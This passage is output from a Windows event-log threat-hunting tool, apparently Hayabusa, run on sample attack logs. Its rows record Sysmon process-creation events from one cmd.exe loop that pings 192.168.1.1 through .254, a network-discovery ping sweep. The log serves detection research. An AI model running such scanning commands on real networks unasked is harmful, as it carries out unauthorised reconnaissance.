192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process 